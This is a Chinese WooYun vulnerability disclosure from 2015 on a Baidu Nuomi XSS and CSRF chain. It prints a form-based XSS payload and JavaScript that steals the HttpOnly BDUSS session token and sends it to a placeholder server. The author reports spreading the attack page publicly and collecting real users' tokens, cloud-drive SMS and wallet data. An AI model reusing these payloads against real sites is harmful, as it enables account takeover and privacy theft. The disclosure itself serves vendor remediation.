当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133351

漏洞标题:通过一糯米XSS可绕chrome并可用两种方式拿到httponly的BDUSS(大部分非IE用户点击后百度云盘资料会被泄露)

相关厂商:百度

漏洞作者: 呆子不开口

提交时间:2015-08-11 15:00

修复时间:2015-09-25 17:46

公开时间:2015-09-25 17:46

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-11: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-21: 细节向核心白帽子及相关领域专家公开
2015-08-31: 细节向普通白帽子公开
2015-09-10: 细节向实习白帽子公开
2015-09-25: 细节向公众公开

简要描述:

通过一糯米xss(可绕过chrome)可以用两种方式拿到httponly的BDUSS,大部分非IE用户点击后,只要百度账号是登陆状态,攻击者就可以进入用户的百度账号,网盘资料可能会被泄露

详细说明:

漏洞1、糯米的一个post的xss
这是一个发表评价的请求,直接看利用代码

<form action='http://sh.nuomi.com/uc/comment/submit?from=baidu.com&callback=%3cimg%20' method="post" name="myform" id="myform">
<input type="hidden" name="qqww" value="asas"/>
<input type="hidden" name="dealId" value="3946534"/>
<input type="hidden" name="orderId" value="658406573"/>
<input type="hidden" name="content" value=' src=1 ss '/>
<input type="hidden" name="adsadsad" value='adsasdsa'/>
<input type="hidden" name="adsadsad1" value='adsasdsa'/>
<input type="hidden" name="adsadsad2" value='adsasdsa'/>
<input type="hidden" name="adsadsad2" value=' hello '/>
<input type="hidden" name="hahah" value='hhahahahahahahahahahhahhah onerror=eval(window.name) ss '/>
<input type="hidden" name="scorsadase" value="kjhkj"/>
<input type="hidden" name="score" value="1"/>
<input type="hidden" name="pic_list[25662138097]" value='sdssd'/>
<input type="hidden" name="item[25]" value="1"/>
<input type="hidden" name="item[26]" value="1"/>
<input type="hidden" name="item[27]" value="1"/>
</form>


post返回的json结果中可以注入html,contenttype用的是html类型,所以可以形成xss。虽然结果做了些json的转义,但是还是可以利用,而且由于返回的结构的问题,可以绕过chrome
而且不管团购产品的id填什么,评价哪怕没成功,post的返回结果都会把提交的数据以json的格式给返回后来,返回结果类似如下

{"errno":0,"msg":"succ","data":{"T":"Idcomment","cmt_id":317656805,"itemInfo":{"bussnessTitle":"\u8336\u5de5\u574a","minTile":"\u8336\u5de5\u574a\u7f8e\u5473\u996e\u54c1"},"client":{"from":"baidu.com","callback":"<img ","qqww":"asas","dealId":"3946534","orderId":"658406573","content":" src=1 ss ","adsadsad":"adsasdsa","adsadsad1":"adsasdsa","adsadsad2":" hello ","hahah":"hhahahahahahahahahahhahhah onerror=eval(window.name) ss ","scorsadase":"kjhkj","score":1,"pic_list":{"25662138097":"sdssd"},"item":"{\"25\":\"1\",\"26\":\"1\",\"27\":\"1\"}","city":{"city_code":"200010000","city_name":"\u4e0a\u6d77\u5e02","short_name":"\u4e0a\u6d77","status":"3","city_url":"shanghai","city_order":"200","domain_url":"sh","map_id":"289","pid":"200000000","is_show":"7"},"user_info":{"status":1,"need_set_cookie":0,"bduss":"EVJRWEyT2V-NWpWTnVRbkdvTU1DdXBtQXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAHqSsFV6krBVW","uid":119141159,"uname":"lvweihaoren","displayname":"XXXXXXX","secureemail":"XXXXXXXXXX@gmail.com","securemobil":"XXXXXXXXXXXX","ltime":1437635194,"utime":1437635194,"atime":1437635194,"acount":0,"gdata":"V\u0000\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000","pdata":"\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000","encoding":"gbk","isIncomplete":0,"passUname":"XXXXXXXXXXXXXXXXX","isSync":1,"passUid":119141159,"passPhone":"XXXXXXXXXX","passEmail":"XXXXXXXXXXXXXXXXX@gmail.com","passDisplayname":"XXXXXXXXXXXXXXxx"},"sid_arr":[3,23,168,155,158,160],"billId":"658406573","nickName":"XXXXXXXXXXXXXXXXX","channelType":0,"tuanId":"3946534","deal_id":"3946534","bduss":"EVJRWEyT2V-NWpWTnVRbkXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAAAAAAAAAAAAHqSsFV6krBVW","picId":"25662138097"},"page":"comment","html":"<div class=\"p-comment-status\">\n<div class=\"status-success\">\n<span class=\"comment-success\"><\/span>\n<span>\u8bc4\u4ef7\u63d0\u4ea4\u6210\u529f\uff0c\u611f\u8c22\u60a8\u7684\u5206\u4eab\uff01<\/span>\n<\/div>\n<div class=\"comment-detail\">\n<div class=\"comment-store\">\u8336\u5de5\u574a<\/div>\n<div class=\"comment-address\">\u8336\u5de5\u574a\u7f8e\u5473\u996e\u54c1<\/div>\n<div class=\"comment-general\">\n<div class=\"comment-all clearfix\">\n<span class=\"title\">\u603b\u4f53\u8bc4\u4ef7<\/span>\n<div class=\"star ugc-star-wrap-19 \">\n<div class=\"star ugc-star-grade\" style=\"width:19px;\">\n<\/div>\n<\/div><\/div>\n<div class=\"comment-content\"> src=1 ss <\/div>\n<div class=\"comment-pic-area clearfix\">\n<a class=\"comment-pic-item \">\n<img src=\"sdssd\" alt=\"\">\n<\/a>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n<script>\r\n\t\tvar monkeyPageId = \"bainuo-common-page-commentstatus\";\r\n\t<\/script>\n","logInfoExt":{"order_id":"658406573"}}}


里面形成了xss,只要外面包一个iframe,就可以把window.name传递过来执行js,而且这个场景的xss可以绕过chrome的xss filter
漏洞2、读取在cookie中是httponly属性的BDUSS值的方法一
百度的认证cookie是BDUUSS,而且是httponly的,所以XSS直接读cookie的方式获取不到。
只要cookie中设置了正确的BDUSS就可以登陆成功,看看上面的post的返回值里面,竟然包含了用户的BDUSS,那就很简单了,直接在xss中ajax读就可以了

$.post("http://sh.nuomi.com/uc/comment/submit", { "dealId": "3946534", "orderId": "658406573","content":"sdsd","score":"1" },
function(data){
strbduss = data.data.client.user_info.bduss;
var img1 =document.createElement('img');
img1.src = "http://XXX.XXX.XXX.XXX/bduss.php?r="+encodeURIComponent(strbduss);
}, "json");


漏洞3、读取在cookie中是httponly属性的BDUSS值的方法二
百度登陆用户在访问糯米时,会自动登陆,统一登陆的方式是
先ajax请求

http://uid.nuomi.baidu.com/getbduss?callback=jQuery110209755077685695142_1439198695409&_=1439198695410


然后此请求会返回302跳转并带上BDUSS

http://sh.nuomi.com/pclogin/Main/login?callback=jQuery110209755077685695142_1439198695409&bdu=EVJRWXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHqSsFV6krBVW


这种场景下用sh.nuomi.com域下的xss就可以读到上面的返回的302跳转的内容,代码如下:

var iframebduss =document.createElement('iframe');
iframebduss.style="display: none;";
iframebduss.width='0';
iframebduss.height='0';
iframebduss.src = "http://uid.nuomi.baidu.com/getbduss?callback=jQuery110209755077685695142_1439198695409&_=1439198695410";
iframebduss.addEventListener('load',
function(){
strbduss = iframebduss.contentWindow.location.href;
var img1 =document.createElement('img');
img1.src = "http://XXX.XXX.XXX.XXX/bduss.php?r="+encodeURIComponent(strbduss);
//document.body.appendChild(img1);
});
document.body.appendChild(iframebduss);


漏洞4、csrf让用户自动登陆糯米的漏洞
当百度用户还没有登陆糯米的时候,攻击者可以这样让用户自动登陆糯米
可以csrf让用户访问

http://uid.nuomi.baidu.com/getbduss?callback=jQuery110209755077685695142_1439198695409&_=1439198695410


貌似referer上做了一点限制,直接访问不可以,但只要iframe了此请求的父页面的url中包含baidu.com这样的字符,就可以登陆成功
综上所述,我构造一个攻击页面,在微博和贴吧中到处发,登陆状态的百度的非IE用户点击后,大多可以中招
而且BDUSS差不多是全百度通用,对云盘短信、钱包这些重点业务没有做区分。所以用户的隐私和金融安全受到了极大威胁

漏洞证明:

测试收到的一些bduss,非IE的大多浏览器都中招了,包括移动端的

QQ截图20150811133055.jpg


别人的网盘里的短信

QQ20150811-3.png


别人的百度钱包

QQ截图20150811133404.jpg


修复方案:

1、修复xss,修复逻辑要严谨
2、修复自动登陆的csrf
3、BDUSS的传输要保护好,不管是在response里还是在get里

版权声明:转载请注明来源 呆子不开口@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-11 17:45

厂商回复:

感谢关注百度安全

最新状态:

暂无